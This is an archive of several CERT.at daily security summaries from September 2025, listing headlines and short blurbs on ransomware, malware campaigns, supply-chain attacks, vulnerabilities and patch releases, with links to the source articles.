--------------------------------------------- Hackers leaked 600 GB of data linked to the Great Firewall of China, exposing documents, code, and operations. Full details available on the GFW Report. --------------------------------------------- https://hackread.com/great-firewall-of-china-data-published-largest-leak/ ∗∗∗ ShadowSilk Data Exfiltration Attack ∗∗∗ --------------------------------------------- FortiGuard Labs’ network telemetry has observed active exploitation of known vulnerabilities in Drupal Core and the WP-Automatic WordPress plugin for initial access. Following compromise, attackers deploy multiple web shells and utilities to enable lateral movement, privilege escalation, and the installation of remote access trojans (RATs). --------------------------------------------- https://fortiguard.fortinet.com/outbreak-alert/shadowsilk-data-exfiltration ∗∗∗ Phishing campaign targeting crates.io users ∗∗∗ --------------------------------------------- We received multiple reports of a phishing campaign targeting crates.io users (from the rustfoundation.dev domain name), mentioning a compromise of our infrastructure and asking users to authenticate to limit damage to their crates. --------------------------------------------- https://blog.rust-lang.org/2025/09/12/crates-io-phishing-campaign/ ∗∗∗ The Internet Coup ∗∗∗ --------------------------------------------- A Technical Analysis on How a Chinese Company is Exporting The Great Firewall to Autocratic Regimes. --------------------------------------------- https://interseclab.org/research/the-internet-coup/ ===================== = Vulnerabilities = ===================== ∗∗∗ Lücke in Microsoft Agentic AI und Visual Studio kann Schadcode passieren lassen ∗∗∗ --------------------------------------------- Angreifer können an einer Schwachstelle in Microsoft Agentic AI und Visual Studio ansetzen. Klappt eine Attacke, können sie Schadcode ausführen und Systeme mit hoher Wahrscheinlichkeit vollständig kompromittieren. Ein Sicherheitsupdate steht zum Download bereit. --------------------------------------------- https://www.heise.de/news/Schadcode-Schlupfloch-in-Microsoft-Agentic-AI-und… ∗∗∗ Jetzt patchen! Attacken auf Android-Smartphones von Samsung beobachtet ∗∗∗ --------------------------------------------- Derzeit nutzen Angreifer eine Sicherheitslücke in Samsung-Smarthpones mit Android 13, 14, 15 und 16 aus. Darüber kann Schadcode auf Geräte gelangen. Ein Sicherheitspatch ist für ausgewählte Geräte verfügbar. --------------------------------------------- https://www.heise.de/news/Jetzt-patchen-Attacken-auf-Android-Smartphones-vo… ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (cups, kernel, and mysql-selinux and mysql8.4), Debian (cjson, jetty9, and shibboleth-sp), Fedora (bustle, cef, checkpointctl, chromium, civetweb, cups, forgejo, jupyterlab, kernel, libsixel, linenoise, maturin, niri, perl-Cpanel-JSON-XS, python-uv-build, ruff, rust-busd, rust-crypto-auditing-agent, rust-crypto-auditing-client, rust-crypto-auditing-event-broker, rust-matchers, rust-monitord, rust-monitord-exporter, rust-secret-service, rust-tracing-subscriber, rustup, tcpreplay, tuigreet, udisks2, uv, and xwayland-satellite), Oracle (cups, gdk-pixbuf2, kernel, mysql-selinux and mysql8.4, and php:8.2), Red Hat (kernel, kernel-rt, and multiple packages), Slackware (cups, kernel, and patch), and SUSE (busybox, busybox-links, chromedriver, chromium, cups-filters, curl, go1.25, jasper, java-11-openj9, java-17-openj9, java-1_8_0-openjdk, kernel, kernel-devel, kubo, libssh-config, orthanc-gdcm, python-aiohttp, python-eventlet, python-h2, and xen). --------------------------------------------- https://lwn.net/Articles/1038231/ ∗∗∗ CVE-2025-58434: Critical FlowiseAI Flaw Enables Full Account Takeover ∗∗∗ --------------------------------------------- A severe security vulnerability has been discovered in FlowiseAI, an open-source AI workflow automation tool, exposing users to the risk of complete account compromise. Tracked as CVE-2025-58434, this vulnerability affects both the cloud-hosted version of FlowiseAI and self-hosted deployments that expose the relevant API endpoints. --------------------------------------------- https://thecyberexpress.com/cve-2025-58434/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 12.09.2025
by Daily end-of-shift report 12 Sep '25

12 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 11-09-2025 18:00 − Freitag 12-09-2025 18:00 Handler: Guenes Holler Co-Handler: Felician Fuchs ===================== = News = ===================== ∗∗∗ Panama Ministry of Economy discloses breach claimed by INC ransomware ∗∗∗ --------------------------------------------- Panama's Ministry of Economy and Finance (MEF) has disclosed that one of its computers may have been compromised in a cyberattack. The government noted that it activated the security procedures for these situations, stating that the incident has been contained and didn't impact core systems that are vital to its operations. --------------------------------------------- https://www.bleepingcomputer.com/news/security/panama-ministry-of-economy-d… ∗∗∗ Vidar Infostealer Back with a Vengeance ∗∗∗ --------------------------------------------- The long-running Vidar infostealer has evolved with new obfuscation techniques. That is according to researchers at cybersecurity vendor Aryaka, which published research last week dedicated to a fresh campaign involving the malware-as-a-service Vidar that has emerged in recent weeks. First tracked in late 2018, Vidar is an infostealer that enables affiliates to grab credentials, operating system details, cookies, sensitive financial data, various authentication tokens, and more from compromised environments. --------------------------------------------- https://www.darkreading.com/endpoint-security/vidar-infostealer-back-with-v… ∗∗∗ Senator Wyden Urges FTC to Probe Microsoft for Ransomware-Linked Cybersecurity Negligence ∗∗∗ --------------------------------------------- U.S. Senator Ron Wyden has called on the Federal Trade Commission (FTC) to probe Microsoft and hold it responsible for what he called "gross cybersecurity negligence" that enabled ransomware attacks on U.S. critical infrastructure, including against healthcare networks. --------------------------------------------- https://thehackernews.com/2025/09/senator-wyden-urges-ftc-to-probe.html ∗∗∗ New HybridPetya Ransomware Bypasses UEFI Secure Boot With CVE-2024-7344 Exploit ∗∗∗ --------------------------------------------- Cybersecurity researchers have discovered a new ransomware strain dubbed HybridPetya that resembles the notorious Petya/NotPetya malware, while also incorporating the ability to bypass the Secure Boot mechanism in Unified Extensible Firmware Interface (UEFI) systems using a now-patched vulnerability disclosed earlier this year. --------------------------------------------- https://thehackernews.com/2025/09/new-hybridpetya-ransomware-bypasses.html ∗∗∗ Apple Warns French Users of Fourth Spyware Campaign in 2025, CERT-FR Confirms ∗∗∗ --------------------------------------------- Apple has notified users in France of a spyware campaign targeting their devices, according to the Computer Emergency Response Team of France (CERT-FR). The agency said the alerts were sent out on September 3, 2025, making it the fourth time this year that Apple has notified citizens in the county that at least one of the devices linked to their iCloud accounts may have been compromised as part of highly-targeted attacks. --------------------------------------------- https://thehackernews.com/2025/09/apple-warns-french-users-of-fourth.html ∗∗∗ Huntresss hilarious attacker surveillance splits infosec community ∗∗∗ --------------------------------------------- Security outfit Huntress has been forced onto the defensive after its latest research – described by senior staff as "hilarious" – split opinion across the cybersecurity community. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2025/09/12/huntress_att… ∗∗∗ Bulletproof Host Stark Industries Evades EU Sanctions ∗∗∗ --------------------------------------------- In May 2025, the European Union levied financial sanctions on the owners of Stark Industries Solutions Ltd., a bulletproof hosting provider that materialized two weeks before Russia invaded Ukraine and quickly became a top source of Kremlin-linked cyberattacks and disinformation campaigns. But new findings show those sanctions have done little to stop Stark from simply rebranding and transferring their assets to other corporate entities controlled by its original hosting providers. --------------------------------------------- https://krebsonsecurity.com/2025/09/bulletproof-host-stark-industries-evade… ∗∗∗ Swiss government looks to undercut privacy tech, stoking fears of mass surveillance ∗∗∗ --------------------------------------------- The Swiss government could soon require service providers with more than 5,000 users to collect government-issued identification, retain subscriber data for six months and, in many cases, disable encryption. --------------------------------------------- https://therecord.media/switzerland-digital-privacy-law-proton-privacy-surv… ∗∗∗ Wurden Router-URLs sphairon.box und zyxel.box gekapert? ∗∗∗ --------------------------------------------- Ich stelle mal ein Thema hier in den Blog, das mir jetzt von zwei Lesern gemeldet wurde und mich an einen alten Vorfall bei AVM zur fritz.box-URL erinnert. Es sieht so aus, dass die von Routern (Zyxel, Sphairon) zum Zugriff auf die Router-Funktionen verwendeten URLs sphairon.box und zyxel.box durch registrierte Domains gekapert wurden. Die Zielseiten sind als "malicious" einzustufen. --------------------------------------------- https://www.borncity.com/blog/2025/09/12/wurden-router-urls-sphairon-box-un… ∗∗∗ EvilAI Operators Use AI-Generated Code and Fake Apps for Far-Reaching Attacks ∗∗∗ --------------------------------------------- Combining AI-generated code and social engineering, EvilAI operators are executing a rapidly expanding campaign, disguising their malware as legitimate applications to bypass security, steal credentials, and persistently compromise organizations worldwide. --------------------------------------------- https://www.trendmicro.com/en_us/research/25/i/evilai.html ∗∗∗ Muck Stealer Malware Used Alongside Phishing in New Attack Waves ∗∗∗ --------------------------------------------- A new report from Cofense reveals that cybercriminals are blending phishing and malware, including Muck Stealer, Info Stealer, ConnectWise RAT, and SimpleHelp RAT in dual-threat attacks, making them harder to defend against. --------------------------------------------- https://hackread.com/muck-stealer-malware-phishing-new-attack-waves/ ∗∗∗ Social Engineering & KI: Cyberkriminelle rekrutieren im Darknet ∗∗∗ --------------------------------------------- Cyberkriminelle suchen im Darknet verstärkt nach Experten für Social Engineering und KI. Ein Hinweis darauf, auf welche Bedrohungen Firmen achten sollten. --------------------------------------------- https://heise.de/-10642617 ∗∗∗ ChillyHell macOS Backdoor Resurfaces ∗∗∗ --------------------------------------------- In 2025, cybersecurity researchers uncovered a deeply concerning threat targeting macOS systems called ChillyHell—a modular backdoor malware that had managed to fly under the radar for years by cleverly abusing macOS security mechanisms and Apple’s own notarization process. --------------------------------------------- https://thecyberthrone.in/2025/09/11/chillyhell-macos-backdoor-resurfaces/ ===================== = Vulnerabilities = ===================== ∗∗∗ Samsung patches actively exploited zero-day reported by WhatsApp ∗∗∗ --------------------------------------------- Samsung has patched a remote code execution vulnerability that was exploited in zero-day attacks targeting its Android devices. Tracked as CVE-2025-21043, this critical security flaw affects Samsung devices running Android 13 or later and was reported by the security teams of Meta and WhatsApp on August 13. --------------------------------------------- https://www.bleepingcomputer.com/news/security/samsung-patches-actively-exp… ∗∗∗ Jetzt patchen! Erneut Attacken auf SonicWall-Firewalls beobachtet ∗∗∗ --------------------------------------------- Die "kritische" Sicherheitslücke (CVE-2024-40766) ist seit August vergangenen Jahres bekannt. Wiederholt ist die Schwachstelle in bestimmten Firewalls von SonicWall im Visier von Angreifern. Sicherheitsupdates sind bereits seit rund einem Jahr verfügbar, aber offensichtlich weiterhin nicht flächendeckend installiert. --------------------------------------------- https://www.heise.de/news/Jetzt-patchen-Erneut-Attacken-auf-SonicWall-Firew… ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (cups, imagemagick, libcpanel-json-xs-perl, and libjson-xs-perl), Fedora (checkpointctl, chromium, civetweb, glycin, kernel, libssh, ruff, rust-secret-service, snapshot, and uv), Mageia (curl), Red Hat (kernel), SUSE (cups, curl, perl-Cpanel-JSON-XS, regionServiceClientConfigAzure, regionServiceClientConfigEC2, regionServiceClientConfigGCE, trivy, and xen), and Ubuntu (cups, node-cipher-base, and qemu). --------------------------------------------- https://lwn.net/Articles/1037919/ ∗∗∗ CISA Releases Eleven Industrial Control Systems Advisories ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/alerts/2025/09/11/cisa-releases-eleven-ind… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 11.09.2025
by Daily end-of-shift report 11 Sep '25

11 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 10-09-2025 18:00 − Donnerstag 11-09-2025 18:00 Handler: Guenes Holler Co-Handler: Felician Fuchs ===================== = News = ===================== ∗∗∗ New VMScape attack breaks guest-host isolation on AMD, Intel CPUs ∗∗∗ --------------------------------------------- A new Spectre-like attack dubbed VMScape allows a malicious virtual machine (VM) to leak cryptographic keys from an unmodified QEMU hypervisor process running on modern AMD or Intel CPUs. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-vmscape-attack-breaks-gu… ∗∗∗ K2 Think AI Model Jailbroken Mere Hours After Release ∗∗∗ --------------------------------------------- Researchers discovered that measures designed to make AI more transparent to users and regulators can also make it easier for bad actors to abuse. --------------------------------------------- https://www.darkreading.com/application-security/k2-think-llm-jailbroken ∗∗∗ Ordner öffnen reicht: Beliebter KI-Code-Editor führt automatisch Schadcode aus ∗∗∗ --------------------------------------------- Wer den KI-Code-Editor Cursor verwendet, sollte beim Öffnen fremder Repos vorsichtig sein. Es kann unbemerkt Malware ausgeführt werden. --------------------------------------------- https://www.golem.de/news/ordner-oeffnen-reicht-beliebter-ki-code-editor-fu… ∗∗∗ Fake Madgicx Plus and SocialMetrics Extensions Are Hijacking Meta Business Accounts ∗∗∗ --------------------------------------------- Cybersecurity researchers have disclosed two new campaigns that are serving fake browser extensions using malicious ads and fake websites to steal sensitive data. The malvertising campaign, per Bitdefender, is designed to push fake "Meta Verified" browser extensions named SocialMetrics Pro that claim to unlock the blue check badge for Facebook and Instagram profiles. --------------------------------------------- https://thehackernews.com/2025/09/fake-madgicx-plus-and-socialmetrics.html ∗∗∗ Akira ransomware crims abusing trifecta of SonicWall security holes for extortion attacks ∗∗∗ --------------------------------------------- Affiliates of the Akira ransomware gang are again exploiting a critical SonicWall vulnerability abused last summer, after a suspected zero-day flaw actually turned out to be related to a year-old bug. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2025/09/10/akira_ransom… ∗∗∗ Beijing went to EggStreme lengths to attack Philippines military, researchers say ∗∗∗ --------------------------------------------- ‘EggStreme’ framework looks like the sort of thing Beijing would find handy in its ongoing territorial beefs Infosec outfit Bitdefender says it’s spotted a strain of in-memory malware that looks like the work of Chinese advanced persistent threat groups that wanted to achieve persistent access at a “military company” in the Philippines. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2025/09/11/eggstreme_ma… ∗∗∗ Technical Analysis of kkRAT ∗∗∗ --------------------------------------------- Zscaler ThreatLabz has identified a malware campaign targeting Chinese-speaking users, which has been active since early May 2025. The campaign delivers three types of malware: ValleyRAT, FatalRAT, and a new Remote Access Trojan (RAT) that ThreatLabz named kkRAT. --------------------------------------------- https://www.zscaler.com/blogs/security-research/technical-analysis-kkrat ∗∗∗ The Great NPM Heist – September 2025 ∗∗∗ --------------------------------------------- On September 8, 2025, the JavaScript ecosystem experienced what is now considered the largest supply chain attack in npm history. A sophisticated phishing campaign led to the compromise of a trusted maintainer’s account, resulting in the injection of cryptocurrency-stealing malware into 18+ foundational npm packages. --------------------------------------------- https://blog.checkpoint.com/crypto/the-great-npm-heist-september-2025/ ∗∗∗ Global Cyber Threats August 2025: Agriculture in the Crosshairs ∗∗∗ --------------------------------------------- In August 2025, the global cyber threat landscape presented a complex interplay of stability and alarming new challenges. Organizations around the world confronted an average of nearly 2,000 cyber attacks each week—a slight 1% decrease from July but a stark 10% rise compared to the same month last year. --------------------------------------------- https://blog.checkpoint.com/research/global-cyber-threats-august-2025-agric… ∗∗∗ How the Infamous APT 1 Report Exposing China’s PLA Hackers Came to Be ∗∗∗ --------------------------------------------- This is the first in a series of pieces I’ll publish that take an in-depth look at significant events, people and cases in security and surveillance from the past. --------------------------------------------- https://www.zetter-zeroday.com/how-the-infamous-apt-1-report-exposing-china… ∗∗∗ CyberVolk Ransomware: Analysis of Double Encryption Structure and Disguised Decryption Logic ∗∗∗ --------------------------------------------- The CyberVolk ransomware, which first emerged in May 2024, has been launching attacks on public institutions and key infrastructures of various countries, posing a continuous threat. The ransomware is particularly notable for its pro-Russia nature, as it primarily targets anti-Russian countries, making it a geopolitically significant cyber threat. --------------------------------------------- https://asec.ahnlab.com/en/90077/ ∗∗∗ Trigona Rebranding Suspicions and Global Threats, and BlackNevas Ransomware Analysis ∗∗∗ --------------------------------------------- BlackNevas has been continuously launching ransomware attacks against companies in various industries and countries, including South Korea. This post provides a technical analysis on the characteristics, encryption methods, and reasons why BlackNevas encrypts files in a way that makes them impossible to decrypt. --------------------------------------------- https://asec.ahnlab.com/en/90080/ ∗∗∗ New Fileless Malware Attack Uses AsyncRAT for Credential Theft ∗∗∗ --------------------------------------------- LevelBlue Labs reports AsyncRAT delivered through a fileless attack chain using ScreenConnect, enabling credential theft and persistence. --------------------------------------------- https://hackread.com/fileless-malware-attack-asyncrat-credential-theft/ ∗∗∗ CISA Presents Vision for the Common Vulnerabilities and Exposures (CVE) Program ∗∗∗ --------------------------------------------- Agency Unveils Upcoming Program Enhancements: Strengthening Partnerships, Modernization, Transparency and Elevating Data Quality and Responsiveness. --------------------------------------------- https://www.cisa.gov/news-events/news/cisa-presents-vision-common-vulnerabi… ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco IOS XR ARP Broadcast Storm Denial of Service Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in the Address Resolution Protocol (ARP) implementation of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to trigger a broadcast storm, leading to a denial of service (DoS) condition on an affected device. --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ DuckDB NPM packages 1.3.3 and 1.29.2 compromised with malware ∗∗∗ --------------------------------------------- The DuckDB distribution for Node.js on npm was compromised with malware (along with several other packages). An attacker published new versions of four of duckdb’s packages that included malicious code to interfere with cryptocoin transactions. --------------------------------------------- https://github.com/duckdb/duckdb-node/security/advisories/GHSA-w62p-hx95-gf… ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (python3.12-cryptography), Debian (chromium, hsqldb1.8.0, and imagemagick), Fedora (bustle, cef, maturin, rust-busd, rust-crypto-auditing-agent, rust-crypto-auditing-client, rust-crypto-auditing-event-broker, rust-monitord, rust-monitord-exporter, rustup, tuigreet, and wireshark), Oracle (kernel, microcode_ctl, and python3.12-cryptography), Red Hat (httpd:2.4 and multiple packages), SUSE (coreutils, curl, dpkg, ffmpeg-4, glib2, gnutls, go1.23-openssl, go1.24-openssl, go1.25-openssl, grub2, ImageMagick, jbigkit, kernel, libxslt, Mesa, opensc, opera, perl-JSON-XS, polkit, postgresql16, protobuf, python311, python311-deepdiff, sqlite3, ucode-intel, and warewulf4), and Ubuntu (bind9 and libxml2). --------------------------------------------- https://lwn.net/Articles/1037777/ ∗∗∗ Unauthentifizierte SQL Injection Schwachstelle im Shibboleth Service Provider (SP) (ODBC Interface) ∗∗∗ --------------------------------------------- SEC Consult hat eine unauthentifizierte SQL-Injection-Schwachstelle im Shibboleth Service Provider (SP) in der ODBC Schnittstelle identifiziert, die ein Angreifer ausnutzen könnte, um beliebige Datensätze aus der Datenbank mit den Rechten des Datenbankbenutzers auszulesen. --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/unauthentifizierte-sq… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 10.09.2025
by Daily end-of-shift report 10 Sep '25

10 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Dienstag 09-09-2025 18:00 − Mittwoch 10-09-2025 18:00 Handler: Felician Fuchs Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Phishing im Namen der WKO: Sensible Daten im Visier ∗∗∗ --------------------------------------------- Kriminelle kopieren aktuell eine echte E-Mail-Nachricht der Wirtschaftskammer Österreich. Über ein angehängtes HTML-Dokument wollen sie Ihre Opfer auf ein Fake-Portal locken und dort sensible Daten erbeuten. Wir zeigen Ihnen, woran Sie den Betrugsversuch erkennen können. --------------------------------------------- https://www.watchlist-internet.at/news/phishing-wko/ ∗∗∗ You Already Have Our Personal Data, Take Our Phone Calls Too (FreePBX CVE-2025-57819) ∗∗∗ --------------------------------------------- Today, inside this hellscape we call the Internet, a mean person has discovered a zero-day(s) in FreePBX (now lovingly called CVE-2025-57819). But they didn’t stop there - the dastardly individual(s) then proceeded to exploit FreePBX hosts en-masse. [..] Today, we are publishing our Detection Artefact Generator which you can find here. --------------------------------------------- https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phon… ∗∗∗ US Investment in Spyware Is Skyrocketing ∗∗∗ --------------------------------------------- A new report warns that the number of US investors in powerful commercial spyware rose sharply in 2024 and names new countries linked to the dangerous technology. --------------------------------------------- https://www.wired.com/story/us-spyware-investment/ ∗∗∗ CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems ∗∗∗ --------------------------------------------- Cybersecurity researchers have discovered two new malware families, including a modular Apple macOS backdoor called CHILLYHELL and a Go-based remote access trojan (RAT) named ZynorRAT that can target both Windows and Linux systems. --------------------------------------------- https://thehackernews.com/2025/09/chillyhell-macos-backdoor-and-zynorrat.ht… ∗∗∗ Pwn My Ride: Exploring the CarPlay Attack Surface ∗∗∗ --------------------------------------------- At the recent DefCon conference, we had the opportunity to present Pwn My Ride, a comprehensive exploration of the Apple CarPlay attack surface. With vehicles becoming increasingly connected, the security of in-car systems like CarPlay is critical. --------------------------------------------- https://www.oligo.security/blog/pwn-my-ride-exploring-the-carplay-attack-su… ∗∗∗ Kerberoasting ∗∗∗ --------------------------------------------- These “Kerberoasting” attacks have been around for ages: the technique and name is credited to Tim Medin who presented it in 2014 (and many popular blogs followed up on it) but the vulnerabilities themselves are much older. [..] I’ll bet most Windows people already know this stuff, but I only happened to learn about it today, after seeing a letter from Senator Wyden to Microsoft, describing how this vulnerability was used in the May 2024 ransomware attack on the Ascension Health hospital system. --------------------------------------------- https://blog.cryptographyengineering.com/2025/09/10/kerberoasting/ ∗∗∗ New Linux Botnet Combines Cryptomining and DDoS Attacks ∗∗∗ --------------------------------------------- Cyble threat intelligence researchers have identified a sophisticated Linux botnet built for cryptocurrency mining, remote command execution, and dozens of DDoS attack types. Cyble Research and Intelligence Labs (CRIL) researchers have dubbed the campaign “Luno.” --------------------------------------------- https://thecyberexpress.com/linux-botnet-combines-cryptomining-and-ddos/ ∗∗∗ Apple Introduces Memory Integrity Enforcement in iPhone 17 to Fight Spyware Exploits ∗∗∗ --------------------------------------------- Apple has introduced Memory Integrity Enforcement (MIE), a system-wide security feature designed to crush one of the most persistent threats to iPhone users—that of Spyware. The company describes MIE as “the most significant upgrade to memory safety in the history of consumer operating systems.” --------------------------------------------- https://thecyberexpress.com/memory-integrity-enforcement-in-iphone-17/ ===================== = Vulnerabilities = ===================== ∗∗∗ Microsoft September 2025 Patch Tuesday fixes 81 flaws, two zero-days ∗∗∗ --------------------------------------------- Today is Microsofts September 2025 Patch Tuesday, which includes security updates for 81 flaws, including two publicly disclosed zero-day vulnerabilities. [..] The two publicly disclosed zero-days are: CVE-2025-55234 - Windows SMB Elevation of Privilege Vulnerability [..] CVE-2024-21907 - VulnCheck: CVE-2024-21907 Improper Handling of Exceptional Conditions in Newtonsoft.Json --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/microsoft-september-2025-pa… ∗∗∗ Patchday Adobe: Lücken in Acrobat & Co. können Schadcode auf PCs lassen ∗∗∗ --------------------------------------------- Auflistung der Sicherheitspatches: Acrobat and Reader, After Effects, ColdFusion, Commerce, Dreamweaver, Experience Manager, Premiere Pro, Substance 3D Modeler, Substance 3D Viewer --------------------------------------------- https://www.heise.de/news/Patchday-Adobe-Luecken-in-Acrobat-Co-koennen-Scha… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Fedora (buildah, containers-common, glycin, loupe, podman, rust-matchers, and rust-tracing-subscriber), Red Hat (fence-agents, jackson-annotations, jackson-core, jackson-databind, jackson-jaxrs-providers, and jackson-modules-base, pki-deps:10.6, python-requests, python3.12-cryptography, redis:6, redis:7, and resource-agents), Slackware (libssh), SUSE (aide, cloud-init, iperf, java-1_8_0-openjdk, jq, kernel-devel, python-deepdiff, regionServiceClientConfigAzure, regionServiceClientConfigEC2, and regionServiceClientConfigGCE), and Ubuntu (gnutls28). --------------------------------------------- https://lwn.net/Articles/1037471/ ∗∗∗ CISA Releases Fourteen Industrial Control Systems Advisories ∗∗∗ --------------------------------------------- ICSA-25-252-01 Rockwell Automation ThinManager, ICSA-25-252-02 ABB Cylon Aspect BMS/BAS, ICSA-25-252-03 Rockwell Automation Stratix IOS, ICSA-25-252-04 Rockwell Automation FactoryTalk Optix, ICSA-25-252-05 Rockwell Automation FactoryTalk Activation Manager, ICSA-25-252-06 Rockwell Automation CompactLogix® 5480, ICSA-25-252-07 Rockwell Automation ControlLogix 5580, ICSA-25-252-08 Rockwell Automation Analytics LogixAI, ICSA-25-252-09 Rockwell Automation 1783-NATR --------------------------------------------- https://www.cisa.gov/news-events/alerts/2025/09/09/cisa-releases-fourteen-i… ∗∗∗ Google Chrome: Stable Channel Update for Desktop ∗∗∗ --------------------------------------------- http://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desk… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 09.09.2025
by Daily end-of-shift report 09 Sep '25

09 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Montag 08-09-2025 18:00 − Dienstag 09-09-2025 18:00 Handler: Felician Fuchs Co-Handler: Guenes Holler ===================== = News = ===================== ∗∗∗ TOR-Based Cryptojacking Attack Expands Through Misconfigured Docker APIs ∗∗∗ --------------------------------------------- Cybersecurity researchers have discovered a variant of a recently disclosed campaign that abuses the TOR network for cryptojacking attacks targeting exposed Docker APIs. Akamai, which discovered the latest activity last month, said its designed to block other actors from accessing the Docker API from the internet. --------------------------------------------- https://thehackernews.com/2025/09/tor-based-cryptojacking-attack-expands.ht… ∗∗∗ GitHub Account Compromise Led to Salesloft Drift Breach Affecting 22 Companies ∗∗∗ --------------------------------------------- Salesloft has revealed that the data breach linked to its Drift application started with the compromise of its GitHub account. Google-owned Mandiant, which began an investigation into the incident, said the threat actor, tracked as UNC6395, accessed the Salesloft GitHub account from March through June 2025. Its currently not known how the digital intruders gained access to the GitHub account. --------------------------------------------- https://thehackernews.com/2025/09/github-account-compromise-led-to.html ∗∗∗ RatOn Android Malware Detected With NFC Relay and ATS Banking Fraud Capabilities ∗∗∗ --------------------------------------------- A new Android malware called RatOn evolved from a basic tool capable of conducting Near Field Communication (NFC) attacks to a sophisticated remote access trojan with Automated Transfer System (ATS) capabilities to conduct device fraud. --------------------------------------------- https://thehackernews.com/2025/09/raton-android-malware-detected-with-nfc.h… ∗∗∗ Axios Abuse and Salty 2FA Kits Fuel Advanced Microsoft 365 Phishing Attacks ∗∗∗ --------------------------------------------- Threat actors are abusing HTTP client tools like Axios in conjunction with Microsofts Direct Send feature to form a "highly efficient attack pipeline" in recent phishing campaigns, according to new findings from ReliaQuest. --------------------------------------------- https://thehackernews.com/2025/09/axios-abuse-and-salty-2fa-kits-fuel.html ∗∗∗ Salt Typhoon and UNC4841: Silent Push Discovers New Domains; Urges Defenders to Check Telemetry and Log Data ∗∗∗ --------------------------------------------- Silent Push has identified dozens of previously unreported domains, all aiming to obtain long-term, stealthy access to targeted organizations, used by the Chinese APT group, Salt Typhoon, along with some related People’s Republic of China (PRC) state-backed threat actors. --------------------------------------------- https://www.silentpush.com/blog/salt-typhoon-2025/ ∗∗∗ BSI warnt: "Digitale Angriffsflächen im Automobilsektor wachsen rasant" ∗∗∗ --------------------------------------------- Digitale Dienste, Over-the-Air-Updates, KI und vernetzte Steuergeräte prägen Fahrzeugarchitekturen, weiß das BSI. Hersteller und Ausrüster müssten vorsorgen. --------------------------------------------- https://www.heise.de/news/BSI-warnt-Digitale-Angriffsflaechen-im-Automobils… ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (kernel and kernel-rt), Debian (openafs and qemu), Fedora (buildah, containers-common, podman, python-flask, and snapshot), Mageia (postgresql, python-django, and udisks2), Oracle (kernel and libxml2), Red Hat (apache-commons-beanutils, firefox, httpd, httpd:2.4, kernel, kernel-rt, mod_http2, qt5-qt3d, and thunderbird), Slackware (libxml2), SUSE (firebird, go1.25-openssl, ImageMagick, microcode_ctl, netty, netty-tcnative, and ovmf), and Ubuntu (libetpan and postgresql-14, postgresql-16, postgresql-17). --------------------------------------------- https://lwn.net/Articles/1037308/ ∗∗∗ Unmasking The Gentlemen Ransomware: Tactics, Techniques, and Procedures Revealed ∗∗∗ --------------------------------------------- An analysis of the Gentlemen ransomware group, which employs advanced, adaptive tactics, techniques, and procedure to target critical industries worldwide. --------------------------------------------- https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-rans… ∗∗∗ Zero-Day in Sitecore Exploited to Deploy WEEPSTEEL Malware ∗∗∗ --------------------------------------------- Hackers exploit a Sitecore zero-day (CVE-2025-53690) to deploy WEEPSTEEL Malware via ViewState attacks, enabling Remote Code Execution (RCE). --------------------------------------------- https://hackread.com/zero-day-sitecore-exploited-deploy-weepsteel-malware/ ∗∗∗ OpenAI Paper: Halluzinationen offenbar unumgänglich ∗∗∗ --------------------------------------------- In einem neuen, wissenschaftlichen Paper, das OpenAI veröffentlicht hat, geht es um Halluzinationen. Das sind falsche Informationen und Zusammenhänge, die Large Language Models (LLMs) und damit auch KI-Chatbots ausgeben. Alle KI-Unternehmen arbeiten daran, Halluzinationen möglichst gering zu halten. Sie ganz auszuschalten, scheint hingegen unmöglich. Das schreibt nun auch OpenAI selbst. --------------------------------------------- https://heise.de/-10637744 ∗∗∗ LockBit Attempts Comeback with LockBit 5.0 Ransomware Release ∗∗∗ --------------------------------------------- LockBit was once the most feared ransomware group until global law enforcement action sent the group into decline last year. Now the threat group hopes to mount a comeback with LockBit 5.0. --------------------------------------------- https://thecyberexpress.com/lockbit-5-0-ransomware/ ===================== = Vulnerabilities = ===================== ∗∗∗ Adobe patches critical SessionReaper flaw in Magento eCommerce platform ∗∗∗ --------------------------------------------- Adobe is warning of a critical vulnerability (CVE-2025-54236) in its Commerce and Magento Open Source platforms that researchers call SessionReaper and describe as one of " the most severe" flaws in the history of the product. --------------------------------------------- https://www.bleepingcomputer.com/news/security/adobe-patches-critical-sessi… ∗∗∗ Populäre JavaScript Pakete manipuliert ∗∗∗ --------------------------------------------- Eine Reihe populärer JavaScript Pakete wurde kürzlich manipuliert um Krypotwährungstransaktionen zu manipulieren. Ursache 